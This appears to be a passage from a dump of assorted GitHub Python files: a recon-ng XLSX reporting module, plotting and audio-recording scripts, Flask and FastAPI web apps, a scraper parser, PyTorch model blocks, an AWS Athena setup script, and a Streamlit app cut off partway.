'Creates an Excel compatible XLSX file containing the entire data set.',\n 'options': (\n ('filename', os.path.join(BaseModule.workspace, 'results.xlsx'), True, 'path and filename for output'),\n ),\n }\n\n def module_run(self):\n filename = self.options['filename']\n # create an new xlsx file\n with xlsxwriter.Workbook(filename, {'strings_to_urls': False}) as workbook:\n tables = self.get_tables()\n # loop through all tables in the database\n for table in tables:\n # create a worksheet for the table\n worksheet = workbook.add_worksheet(table)\n # build the data set\n rows = [tuple([x[0] for x in self.get_columns(table)])]\n rows.extend(self.query('SELECT * FROM \"%s\"' % (table)))\n # write the rows of data to the xlsx file\n for r in range(0, len(rows)):\n for c in range(0, len(rows[r])):\n worksheet.write(r, c, rows[r][c])\n self.output('All data written to \\'%s\\'.' % (filename))\n","repo_name":"sabri-zaki/EasY_HaCk","sub_path":".modules/.recon-ng/modules/reporting/xlsx.py","file_name":"xlsx.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1668,"dataset":"github-code","pt":"66"} +{"seq_id":"34206614577","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nfrom textwrap import fill\n\nfiles = ['Klasyfikator', 'Cecha', 'UsunieteCechy']\ncharts = ['Klasyfikatory', 'Cechy', 'Usunięte Cechy']\nxlabels = ['Średnia Precyzja', 'Średnia Dokładność', 'Średnia Czułość']\n\nfor file_name, charts_names in zip(files, charts):\n classifiers = pd.read_csv(file_name + '.csv', sep=';', header=0)\n\n for index, row, in classifiers.iterrows():\n row_results = []\n row_results.append(row['Średnia Precyzja'])\n row_results.append(row['Średnia Dokładność'])\n row_results.append(row['Średnia Czułość'])\n \n plt.plot(xlabels, row_results, zorder=3)\n plt.scatter(x=xlabels, y=row_results, label=fill(row['Nazwa'], 15), zorder=6)\n\n plt.grid(alpha=0.2, zorder=0)\n plt.xlabel('Metryka')\n plt.ylabel('Wartość')\n plt.title(charts_names)\n plt.tight_layout()\n ax = plt.subplot(111)\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width*0.7, box.height])\n legend_x = 1\n legend_y = 0.5\n plt.legend(loc='center left', bbox_to_anchor=(legend_x, legend_y))\n plt.savefig(file_name + '.png', dpi=300)\n plt.close()\n\n\n i = 0\n clas = len(classifiers.index)\n for index, row, in classifiers.iterrows():\n plt.bar(i * clas, row['Średni Czas'], label=fill(row['Nazwa'], 15), zorder=3)\n i = i + 0.15\n\n plt.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n plt.grid(alpha=0.2, zorder=0)\n plt.xlabel('Średni czas')\n plt.ylabel('Czas (s)')\n plt.title(charts_names)\n plt.tight_layout()\n ax = plt.subplot(111)\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width*0.65, box.height])\n legend_x = 1\n legend_y = 0.5\n plt.legend(loc='center left', bbox_to_anchor=(legend_x, legend_y))\n plt.savefig(file_name + '_Czas.png', dpi=300)\n plt.close()\n\n ","repo_name":"Podlewski/MUM","sub_path":"Projekt/ny_felony_analysis/classification/charter.py","file_name":"charter.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72697036051","text":"from flask import render_template, flash, redirect, url_for # request, send_from_directory\nfrom app import app # db\nfrom pickle import load\nfrom keras.models import load_model\nfrom keras import backend\nfrom app.forms import PhotoForm, CaptionForm\nfrom app.model import extract_features_2, generate_caption\n# from app.database import Image\nfrom werkzeug.utils import secure_filename\n# import os\nimport boto3\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n form = PhotoForm()\n if form.validate_on_submit():\n f = form.photo.data\n filename = secure_filename(f.filename)\n # f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n # os.rename(os.path.join(app.config['UPLOAD_FOLDER'], filename), os.path.join(app.config['DISPLAY_FOLDER'], filename))\n # path = os.path.join(app.config['FINAL_FOLDER'], filename)\n\n s3 = boto3.resource('s3')\n\n if filename.rsplit('.', 1)[1].lower() in set(['jpg', 'jpeg']):\n # s3.Bucket('caption-maker-bucket').put_object(Key='image_{}.jpg'.format(db.session.query(Image).count()+1), Body=f)\n # stored_as = 'image_{}.jpg'.format(db.session.query(Image).count()+1)\n # image = Image(filepath = 'https://s3.amazonaws.com/caption-maker-bucket/' + stored_as, caption = caption)\n stored_as = 'uploaded_image.jpg'\n s3.Bucket('caption-maker-bucket').put_object(Key=stored_as, Body=f)\n\n elif filename.rsplit('.', 1)[1].lower() in set(['png']):\n stored_as = 'uploaded_image.png'\n s3.Bucket('caption-maker-bucket').put_object(Key='uploaded_image.png', Body=f)\n \n # db.session.add(image)\n # db.session.commit()\n\n # flash(caption)\n return redirect(url_for('caption', filename = stored_as))\n return render_template('index.html', title = 'The Caption App', form = form)\n\n@app.route('/caption/', methods=['GET', 'POST'])\ndef caption(filename):\n # image = Image.query.filter_by(id = db.session.query(Image).count()).first_or_404()\n # caption = image.caption\n backend.clear_session()\n\n # load the tokenizer\n tokenizer = load(open('app/tokenizer.pkl', 'rb'))\n # hard-code max sequence length\n max_length = app.config['MAX_LENGTH']\n # load the model parameters\n model = load_model('app/resnet_model-ep03-loss3.586-val_loss3.777.h5')\n\n form = CaptionForm()\n if form.validate_on_submit():\n s3_client = boto3.client('s3')\n image = s3_client.get_object(Bucket='caption-maker-bucket',Key=filename)['Body']\n # image = 'https://s3.amazonaws.com/caption-maker-bucket/' + filename\n\n # prepare the photograph\n photo = extract_features_2(image)\n\n # generate the caption\n caption = generate_caption(model, photo, tokenizer, max_length)\n\n return render_template('caption.html', title = 'Generated Caption', filename = filename, caption = caption)\n return render_template('caption.html', title = 'Generate Caption', filename = filename, form = form)\n\n# page describing use cases\n# option for caption to be read aloud\n# top vocab words and their counts","repo_name":"kadakia/caption_app","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36225655947","text":"\"\"\"\nThe Parser module provides the tools required to parse URLs.\n\n\"\"\"\nimport importlib\nimport hashlib\nimport pkg_resources\nimport re\nimport random\nimport sys\nimport urllib2\nfrom lxml import etree\nfrom libscraper.exceptions import TargetPatternNotFound\n\n\nclass Tree(object):\n\n def __init__(self, code=500, ptype='--', url='--', root=None, msg=''):\n self._ptype = ptype\n self._code = code\n self._url = url\n self._root = root\n self._msg = msg\n\n def __str__(self):\n prt = self._msg if self._root is None else self._root\n return \"[{:s}] {:d} \\\"{:s}\\\" {!s}\".format(self._ptype, self._code, self._url, prt)\n\n\nclass BaseParser(object):\n\n def __init__(self, scraper):\n self.scraper = scraper\n self._targets = scraper._targets\n\n def urlinfo(self, url, init=False):\n \"\"\"\n Extract information from a raw URL.\n Attempts to match a URL to a known site pattern.\n\n Returns Parser model if found.\n\n \"\"\"\n url = url.split('?').pop(0) # Remove any querystring\n match = None\n for target in self._targets:\n for pattern in target._patterns:\n s = pattern.search(url)\n if s is not None:\n match = target.get_info()\n match['info'] = list(s.groups())\n break\n if init and match:\n parser_model = match['parser'] + '.py'\n models = pkg_resources.resource_listdir('models', '')\n if parser_model in models:\n # Load module\n module = importlib.import_module('.'+parser_model[:-3], 'models')\n # Replace parser with Parser instance\n parser = module.Parser(self.scraper) \n match['parser'] = parser\n # Load info from fixtures\n match.update(parser.get_urlinfo(match))\n break\n if not match:\n raise TargetPatternNotFound()\n return {}\n if not init:\n match.update(self.get_urlinfo(match))\n return match\n\n def __connect(self, url, headers=None, proxy=None):\n timeout = 10 # set timeout at 10 seconds\n request = urllib2.Request(url)\n if headers is not None:\n for header in headers:\n request.add_header(header['name'], header['value'])\n user_agents = [\n \"Mozilla/5.0 (Linux i686)\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.60 Safari/537.1\",\n ]\n request.add_header('User-agent', user_agents[random.randint(0, len(user_agents)-1)])\n if proxy is not None:\n proxy_handler = urllib2.ProxyHandler({'http':proxy})\n opener = urllib2.build_opener(proxy_handler)\n else:\n opener = urllib2.build_opener()\n r = opener.open(request, timeout=timeout)\n return r\n\n def get_hash(self, hashbag=[]):\n if not hashbag:\n return None\n return hashlib.sha256(','.join([str(i) for i in hashbag])).hexdigest()\n\n def parse(self, url, headers=None, proxy=None):\n \"\"\"\n Parse URL to a Tree object.\n All URLs are parsed as XML/XHTML, defaulting to HTML when an XML syntax error is found.\n\n -- headers list of request HTTP headers\n -- proxy proxy format: \"IP:port\"\n\n \"\"\"\n try:\n response = self.__connect(url, headers, proxy)\n except urllib2.HTTPError as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, code=e.code, msg=e.msg)\n except urllib2.URLError as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, code=404, msg=e.reason)\n except Exception as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, msg=e)\n try:\n output = response.read()\n except Exception as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, msg=e)\n try:\n ptype = 'XML'\n root = etree.fromstring(output, etree.XMLParser(encoding='utf-8'))\n except etree.XMLSyntaxError:\n try:\n ptype = 'HTML'\n root = etree.fromstring(output, etree.HTMLParser(encoding='utf-8'))\n except Exception as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, msg=e)\n except Exception as e:\n self.scraper.logger.debug(sys.exc_info())\n return Tree(url=url, msg=e)\n if type(root) is not etree._Element:\n root = None\n return Tree(ptype=ptype, code=response.code, url=response.geturl(), root=root)\n\n def get_deals(self, url):\n \"\"\"\n The method should gather the following information:\n - title Main headline\n - headline Sub-headline\n - link Full URI\n - rel_id Local ID (integer)\n - pubDate Publication date (datetime.datetime)\n - site Site name\n - locale Locale code\n - location Location\n - category Category\n - hashid SHA256 hash (used to uniquely identify a deal)\n\n \"\"\"\n return []\n\n def get_deal(self, url):\n \"\"\"\n The method should gather the following information:\n - status If the deal is sold out or expired\n - merchant Merchant name\n - merchant_url Merchant site URL\n - addresses A list of address lines (as Dictionaries)\n - rrp Displayed (or computed) RRP\n - price Displayed price\n - volume Displayed sales amount\n\n \"\"\"\n return {}\n","repo_name":"mgiuliano/libscraper","sub_path":"libscraper/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11182565644","text":"import random\n\n# Define a list of keywords and their corresponding responses\nkeywords = {\n \"hello\": [\"Hi there!\", \"Hello!\", \"Greetings!\"],\n \"goodbye\": [\"Goodbye!\", \"See you later!\", \"Farewell!\"],\n \"thanks\": [\"You're welcome!\", \"No problem!\", \"Glad to help!\"],\n \"name\": [\"My name is Chatbot.\", \"I'm Chatbot.\", \"You can call me Chatbot.\"],\n \"work\":[\"My work is to help you.\"]\n}\n\n# Initialize the chatbot\ndef chatbot():\n print(\"Hello, I'm Chatbot. How can I help you?\")\n \n # Loop to keep the chatbot running\n while True:\n # Get user input\n user_input = input(\"> \").lower()\n \n # Check for keywords and respond with a random message\n if \"hello\" in user_input:\n response = random.choice(keywords[\"hello\"])\n elif \"goodbye\" in user_input:\n response = random.choice(keywords[\"goodbye\"])\n elif \"thanks\" in user_input or \"thank you\" in user_input:\n response = random.choice(keywords[\"thanks\"])\n elif \"name\" in user_input:\n response = random.choice(keywords[\"name\"])\n elif \"work\" in user_input:\n response = random.choice(keywords[\"work\"]) \n else:\n response = \"I'm sorry, I don't understand.\"\n \n # Print the response\n print(response)\n\n# Run the chatbot\nchatbot()\n","repo_name":"dishita-222/AI","sub_path":"basicchat.py","file_name":"basicchat.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43476569923","text":"from vinum import *\nfrom common import *\n\n\n@app.route('/client/get', methods=['GET'])\n@login_required\ndef get_clients():\n return get(g, request, {'client': 'c', 'representant': 'r'},\n ('nom_social', 'no_client_saq', 'no_tel', 'courriel',\n 'no_tel_personnel', 'no_cellulaire', 'note_client',\n 'nom_responsable'), join={'c.representant_id': 'r.representant_id'})\n\n\n@app.route('/client/load', methods=['POST'])\n@login_required\ndef load_client():\n client = pg.select1r(g.db.cursor(), {'client': 'c', 'representant': 'r'},\n join={'c.representant_id': 'r.representant_id'},\n where={'no_client': request.form['no_client']})\n # !!! this should be in the database\n client['default_commission'] = 0.16 if client['type_client'] == 'restaurant' else 0.23\n if 'format_note' in request.form and client['note_client']:\n client['note_client'] = client['note_client'].replace('\\n', ' ')\n return {'success': True, 'data': client}\n\n\n@app.route('/client/save', methods=['POST'])\n@login_required\ndef save_client():\n rf = request.form.to_dict()\n rf['jours_livraison'] = request.form.getlist('jours_livraison')\n no_client = rf.pop('no_client')\n if no_client == '': no_client = None\n else: rf['no_client'] = no_client # to allow resaving it back after delete with the same id\n rf['representant_id'] = pg.selectId(g.db.cursor(), 'representant',\n where={'representant_nom': rf.get('representant_nom')})\n if rf['expedition'] != 'direct':\n rf['jours_livraison'] = None\n if rf['expedition'] != 'succursale':\n rf['no_succursale_saq'] = None\n client = pg.upsert(g.db.cursor(), 'client', where={'no_client': no_client},\n values=rf, filter_values=True, map_values={'': None})\n g.db.commit()\n return {'success': True, 'data': client}\n\n\n@app.route('/client/delete', methods=['POST'])\n@login_required\ndef delete_client():\n pg.delete(g.db.cursor(), 'client', where={'no_client': request.form['no_client']},\n tighten_sequence=True)\n g.db.commit()\n return {'success': True}\n\n\n@app.route('/client/remove_produit', methods=['POST'])\n@login_required\ndef remove_produit():\n cursor = g.db.cursor()\n request.form = dict([(c, f if f else None) for c, f in request.form.items()])\n pg.delete(cursor, 'client_produit',\n where={'no_client': request.form['no_client'],\n 'no_produit_interne': request.form['no_produit_interne']},\n tighten_sequence=True)\n g.db.commit()\n return {'success': True}\n\n\n@app.route('/client/add_produit', methods=['POST'])\n@login_required\ndef add_produit():\n cursor = g.db.cursor()\n request.form = dict([(c, f if f else None) for c, f in request.form.items()])\n no_produit_interne = pg.select1(cursor, 'produit', 'no_produit_interne', where={'type_vin': request.form['type_vin']})\n pg.insert(cursor, 'client_produit', values={'no_client': request.form['no_client'],\n 'no_produit_interne': no_produit_interne})\n g.db.commit()\n return {'success': True}\n","repo_name":"josecerejo/vinum","sub_path":"python/vinum/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4369815147","text":"import torch.nn as nn\n\nclass ConvBlock(nn.Module):\n def __init__(self, in_features, hidden_size=512, kernel_size=9, dropout=0.15):\n super().__init__()\n\n self.conv = nn.Sequential(\n nn.Conv2d(\n in_channels=1,\n out_channels=hidden_size // 4,\n kernel_size=(kernel_size, in_features),\n padding=(kernel_size // 2, 0),\n ),\n nn.BatchNorm2d(hidden_size // 4),\n nn.ELU(),\n nn.Dropout(p=dropout),\n nn.Conv2d(\n in_channels=hidden_size // 4,\n out_channels=hidden_size // 2,\n kernel_size=(kernel_size, 1),\n padding=(kernel_size // 2, 0),\n ),\n nn.BatchNorm2d(hidden_size // 2),\n nn.ELU(),\n nn.Dropout(p=dropout),\n nn.Conv2d(\n in_channels=hidden_size // 2,\n out_channels=hidden_size,\n kernel_size=(kernel_size, 1),\n padding=(kernel_size // 2, 0),\n ),\n nn.BatchNorm2d(hidden_size),\n nn.ELU(),\n nn.Dropout(p=dropout),\n )\n\n def forward(self, x):\n # x: (batch_size, sequence_length, in_features)\n x = x.unsqueeze(1) # (batch_size, 1, sequence_length, in_features)\n x = self.conv(x) # (batch_size, hidden_size, sequence_length, 1)\n x = x.squeeze(3).transpose(1, 2) # (batch_size, sequence_length, hidden_size)\n return x\n\n\nclass GRUBlock(nn.Module):\n def __init__(self, in_features, hidden_size=512, gru_layers=2, dropout=0.15):\n super().__init__()\n\n self.grus_beat = nn.GRU(\n input_size=in_features,\n hidden_size=hidden_size,\n num_layers=gru_layers,\n batch_first=True,\n dropout=dropout,\n bidirectional=True,\n )\n self.linear = nn.Linear(hidden_size*2, hidden_size)\n\n def forward(self, x):\n # x: (batch_size, sequence_length, hidden_size)\n\n x, _ = self.grus_beat(x) # (batch_size, sequence_length, hidden_size*2)\n x = self.linear(x) # (batch_size, sequence_length, hidden_size)\n\n return x\n\n\nclass LinearOutput(nn.Module):\n def __init__(self, in_features, out_features, activation_type='sigmoid', dropout=0.15):\n super().__init__()\n\n self.activation_type = activation_type\n\n self.dropout = nn.Dropout(p=dropout)\n self.linear = nn.Linear(in_features, out_features)\n\n if activation_type == 'sigmoid':\n self.activation = nn.Sigmoid()\n elif activation_type == 'softmax':\n self.activation = nn.LogSoftmax(dim=2)\n elif activation_type == 'softplus':\n self.activation = nn.Softplus()\n\n def forward(self, x):\n # x: (batch_size, sequence_length, in_features)\n\n x = self.dropout(x) # (batch_size, sequence_length, in_features)\n x = self.linear(x) # (batch_size, sequence_length, out_features)\n x = self.activation(x) # (batch_size, sequence_length, out_features)\n\n return x","repo_name":"cheriell/PM2S","sub_path":"pm2s/models/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"66"} +{"seq_id":"10709096047","text":"# _*_ coding:utf-8 _*_\n# @File : user_folder.py\n# @Time : 2020-09-29 08:10\n# @Author: zizle\nfrom fastapi import APIRouter, Depends, Body, HTTPException, Query\nfrom utils.verify import oauth2_scheme, decipher_user_token\nfrom utils.client import encryption_uuid\nfrom db.mysql_z import MySqlZ\nfrom .models import UpdateFolderItem\nfolder_router = APIRouter()\n\n\n@folder_router.post(\"/industry/user-folder/\", summary=\"用户配置更新文件夹\")\nasync def create_update_folder(\n user_token: str = Depends(oauth2_scheme),\n body_item: UpdateFolderItem = Body(...)\n):\n user_id, _ = decipher_user_token(user_token)\n if not user_id:\n raise HTTPException(status_code=401, detail=\"Unknown User\")\n body_item.client = encryption_uuid(body_item.client, user_id) # 加密改变uuid与客户端数据库对应\n # 查询增加或更新\n with MySqlZ() as cursor:\n cursor.execute(\n \"SELECT id,user_id FROM industry_user_folder \"\n \"WHERE client=%s AND user_id=%s AND variety_en=%s AND group_id=%s;\",\n (body_item.client, user_id, body_item.variety_en, body_item.group_id)\n )\n is_exist = cursor.fetchone()\n if is_exist: # 存在则更新\n cursor.execute(\n \"UPDATE industry_user_folder SET folder=%s \"\n \"WHERE client=%s AND variety_en=%s AND group_id=%s AND user_id=%s;\",\n (body_item.folder_path, body_item.client, body_item.variety_en, body_item.group_id, user_id)\n )\n else:\n cursor.execute(\n \"INSERT INTO industry_user_folder (variety_en,group_id,folder,client,user_id) \"\n \"VALUES (%s,%s,%s,%s,%s);\",\n (body_item.variety_en, body_item.group_id, body_item.folder_path, body_item.client, user_id)\n )\n return {\"message\": \"配置成功!\"}\n\n\n@folder_router.get(\"/industry/user-folder/\", summary=\"查询用户配置更新文件夹\")\nasync def get_update_folder(\n user_token: str = Depends(oauth2_scheme),\n variety_en: str = Query(...),\n group_id: int = Query(0, ge=0),\n client: str = Query('', min_length=36, max_length=36)\n):\n user_id, _ = decipher_user_token(user_token)\n if not user_id:\n raise HTTPException(status_code=401, detail=\"Unknown User\")\n client = encryption_uuid(client, user_id) # 加密uuid与数据库对应\n with MySqlZ() as cursor:\n cursor.execute(\n \"SELECT varitytb.variety_name,grouptb.group_name,foldertb.folder \"\n \"FROM industry_user_folder AS foldertb,basic_variety AS varitytb,industry_sheet_group AS grouptb \"\n \"WHERE foldertb.variety_en=varitytb.variety_en \"\n \"AND foldertb.group_id=grouptb.id AND \"\n \"foldertb.client=%s AND foldertb.variety_en=%s AND foldertb.user_id=%s AND \"\n \"IF(%s=0,TRUE,foldertb.group_id=%s);\",\n (client, variety_en, user_id, group_id, group_id)\n )\n folders = cursor.fetchall()\n return {\"message\": \"查询成功!\", \"folders\": folders}\n\n","repo_name":"zizle/FuturesAssistant","sub_path":"modules/industry/user_folder.py","file_name":"user_folder.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"4245626061","text":"from logging import exception\nimport boto3\nimport json,time\n\n# A session stores configuration state and allows you to create service clients and resources \n\n\nsession = boto3.Session(profile_name='working-dev')\n\nathene_client = session.client('athena')\n\ns3 = session.client('s3')\n\nbucket_name ='userdata'\n\n# Binary files and network io (stores data in ram)\nwith open('social_media_data/social_media.csv', 'rb') as r:\n s3.upload_fileobj(r, bucket_name, 'social_media_files.csv')\n\n#Similar behavior as S3Transfer's upload_file() method, except that parameters are capitalized. Detailed examples can be #found at S3Transfer's Usage.\ns3.upload_file(\n Filename='social_media_data/social media visitors.csv' ,\n Bucket=bucket_name,\n Key='social_media_files/social media visitors.csv')\n\n\n# first need to create a workgroup only once\n\ntry:\n response = athene_client.create_work_group(\n Name='data-analysis-wg',\n Configuration={\n 'ResultConfiguration': {\n 'OutputLocation': f's3://{bucket_name}/athena_workgroup',\n 'EncryptionConfiguration': {\n 'EncryptionOption': 'SSE_S3'\n \n }\n \n },\n 'EnforceWorkGroupConfiguration': True,\n 'PublishCloudWatchMetricsEnabled': True,\n 'RequesterPaysEnabled': True\n },\n Description='Athena work group'\n \n )\nexcept Exception as e:\n pass\n\n# create metadata database in athena \n\ncreate_database = \"\"\" create database if not exists social_media_db\"\"\"\n\ndb = athene_client.start_query_execution(\n QueryString=create_database,\n WorkGroup='data-analysis-wg'\n)\n\n#schema \ndata_catalog_query = f\"\"\" CREATE EXTERNAL TABLE if not exists social_media_db.socialmedia (\n `ID` string,\n `Datef` date,\n `DailyEngaged_Users` string,\n `MonthlyEngagedUsers` string,\n `WeeklyPageEngagedUsers` string,\n `LifetimeTotalLikes` string,\n `DailyotalReach` string,\n `WeeklytotalReach` string,\n `TotalMonthlyReach` string\n )\n ROW FORMAT SERDE 'org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe'\n WITH SERDEPROPERTIES (\n 'serialization.format' = ',',\n 'field.delim' = ','\n ) LOCATION 's3://{bucket_name}/social_media_files.csv'\n TBLPROPERTIES ('has_encrypted_data'='false') \"\"\"\n\n\n# get the responce \n\nresponce = athene_client.start_query_execution(\n QueryString=data_catalog_query,\n WorkGroup='data-analysis-wg'\n)\n\n# run select query\n\n\nquery = \"select * from social_media_db.socialmedia\"\n\nresponce = athene_client.start_query_execution(\n QueryString=query,\n WorkGroup='data-analysis-wg'\n)\n\n\nexecution_info = athene_client.get_query_execution(QueryExecutionId = responce['QueryExecutionId'])\n\n# get file location\n\npath= execution_info['QueryExecution']['ResultConfiguration']['OutputLocation']\n\nprint(path)\n\n# how we can use the path and read the file using boto3","repo_name":"amog4/Aws-Dataengineering","sub_path":"Athena/athena.py","file_name":"athena.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9835408329","text":"class Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\ndef print_Ith(head,c,i):\r\n while head != None and c <= i:\r\n if c == i:\r\n print(head.data)\r\n c+=1\r\n head = head.next\r\n return\r\n\r\ndef takeInput():\r\n inputList = [int(ele) for ele in input().split()]\r\n head = None\r\n tail = None\r\n for currData in inputList:\r\n if currData == -1:\r\n break\r\n newNode = Node(currData)\r\n\r\n if head == None:\r\n head = newNode\r\n tail = newNode\r\n else:\r\n tail.next = newNode\r\n tail = newNode\r\n\r\n return head\r\n\r\nhead = takeInput()\r\ni = int(input('enter i:'))\r\nprint_Ith(head,0,i)","repo_name":"Jashwanth-k/Data-Structures-and-Algorithms","sub_path":"4.Linked Lists/print Ith node.py","file_name":"print Ith node.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"44623120412","text":"from os import error\n\n\ndef read_input(file_name):\n with open(file_name, \"r\") as f:\n data = f.read()\n data = data.split(\"\\n\")\n return data\n\n\ndef get_pairs():\n return {\"(\": \")\", \"[\": \"]\", \"{\": \"}\", \"<\": \">\"}\n\n\ndef get_error_score(c):\n if c == \")\":\n return 3\n elif c == \"]\":\n return 57\n elif c == \"}\":\n return 1197\n elif c == \">\":\n return 25137\n\n\ndef process(lines):\n corrupt = 0\n error_score = 0\n for line in lines:\n stack = []\n for c in line:\n if c in get_pairs().keys():\n stack.append(c)\n elif c in get_pairs().values():\n if len(stack) == 0:\n corrupt += 1\n error_score += get_error_score(c)\n break\n last = stack.pop()\n if get_pairs()[last] != c:\n corrupt += 1\n error_score += get_error_score(c)\n break\n return error_score\n\n\nlines = read_input(\"input.txt\")\ncorrupt_lines = process(lines)\nprint(corrupt_lines)\n","repo_name":"kevindong/aoc2021","sub_path":"day10/day10p1.py","file_name":"day10p1.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14905802714","text":"import re\nimport numpy as np\nimport sounddevice as sd\nimport soundfile as sf\nimport time\nimport queue\nimport os, shutil\nfrom underthesea import sent_tokenize\n\nq = queue.Queue()\ncategory = ['thoi_su', 'goc_nhin', 'the_gioi', 'kinh_doanh', 'giai_tri', 'the_thao', 'phap_luat', 'giao_duc', 'suc_khoe', 'doi_song',\n 'du_lich', 'khoa_hoc', 'so_hoa', 'xe', 'y_kien', 'tam_su']\n\nrecordingCat = category[12]\npathToData = 'data/' + recordingCat + '/'\n\nfolder = pathToData\n# for filename in os.listdir(folder):\n# file_path = os.path.join(folder, filename)\n# try:\n# if os.path.isfile(file_path) or os.path.islink(file_path):\n# os.unlink(file_path)\n# elif os.path.isdir(file_path):\n# shutil.rmtree(file_path)\n# except Exception as e:\n# print('Failed to delete %s. Reason: %s' % (file_path, e))\n\ndef callback(indata, frames, time, status):\n \"\"\"This is called (from a separate thread) for each audio block.\"\"\"\n if status:\n print(status)\n q.put(indata.copy())\n\nwith open('article/' + recordingCat + '.txt', 'r', encoding='utf-8') as f:\n # To not to read the url in the first line\n f.readline()\n text = f.read()\n\nsentences = sent_tokenize(text)\n# text = re.sub('[\\n]+', ' ', text)\n# sentences = re.split(r' *[\\.\\?!][\\'\"\\)\\]]* *', text)\n\ni = 16\nfor sentence in sentences[16:]:\n print(str(i) + '\\t' + sentence)\n input('Press Enter to start recording...')\n try:\n fileName = pathToData + recordingCat + '_' + str(i) + '.wav'\n if os.path.exists(pathToData + fileName):\n os.remove(pathToData + fileName)\n file = sf.SoundFile(fileName, mode='x', samplerate=44100, channels=2)\n with sd.InputStream(samplerate=44100, channels=2, callback=callback):\n print('press Ctrl+C to stop the recording')\n while True:\n file.write(q.get())\n except KeyboardInterrupt:\n print('Recording finished: ' + repr(fileName))\n i+=1\n","repo_name":"VietAnhLe2399/SpeechProcessing","sub_path":"project01/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70908867732","text":"import os\nimport shutil\nfrom distutils.dir_util import copy_tree\n\n\"\"\"\nscript.py by Chapardev\nThis program moves web game files (that you can find on this current directory if you use the makefile) to Downloads directory.\nAfter that it copies desktop game directories (../assets and ../bin) to Downloads directory.\n\"\"\"\n\ndef move_file_to_downloads(file_name):\n current_path = os.path.join(\"src\", file_name)\n print(f\"Moving {file_name}\")\n dest_path = os.path.join(\"C:\\\\Users\\\\rando\\\\Downloads\", file_name)\n shutil.move(current_path, dest_path)\n\ndef main():\n EXECUTABLE_NAME = \"Sokobus\"\n\n if os.path.exists(os.path.join(\"src\", f\"{EXECUTABLE_NAME}.html\")):\n os.rename(os.path.join(\"src\", f\"{EXECUTABLE_NAME}.html\"), os.path.join(\"src\", \"index.html\"))\n move_file_to_downloads(\"index.html\")\n move_file_to_downloads(f\"{EXECUTABLE_NAME}.data\")\n move_file_to_downloads(f\"{EXECUTABLE_NAME}.js\")\n move_file_to_downloads(f\"{EXECUTABLE_NAME}.wasm\")\n \n copy_tree(\"assets\", \"C:\\\\Users\\\\rando\\\\Downloads\\\\assets\")\n print(\"Copied assets directory\")\n copy_tree(\"bin\", \"C:\\\\Users\\\\rando\\\\Downloads\\\\bin\")\n print(\"Copied bin directory\")\n \n input(\"Press enter to quit...\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"Limulos/Sokobus","sub_path":"src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2629274862","text":"import streamlit as st\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom depth2cloud import *\nfrom PIL import Image\nfrom utils_dashboard import *\n\ndef save_uploaded_file(uploaded_file, save_path='static/images'):\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n try:\n save_file_path = os.path.join(save_path,uploaded_file.name)\n with open(os.path.join(save_path,uploaded_file.name),'wb') as f:\n f.write(uploaded_file.getbuffer())\n return save_file_path \n except:\n return None\n\nsave_path = 'static/images'\ndepth_save_dir = \"depth_output\"\nsegmentation_model_path = \"./segmentation_model/pointrend_resnet50.pkl\"\ndepth_model_base_path = './midas_depth/weights/'\ncam_mat_save_path = 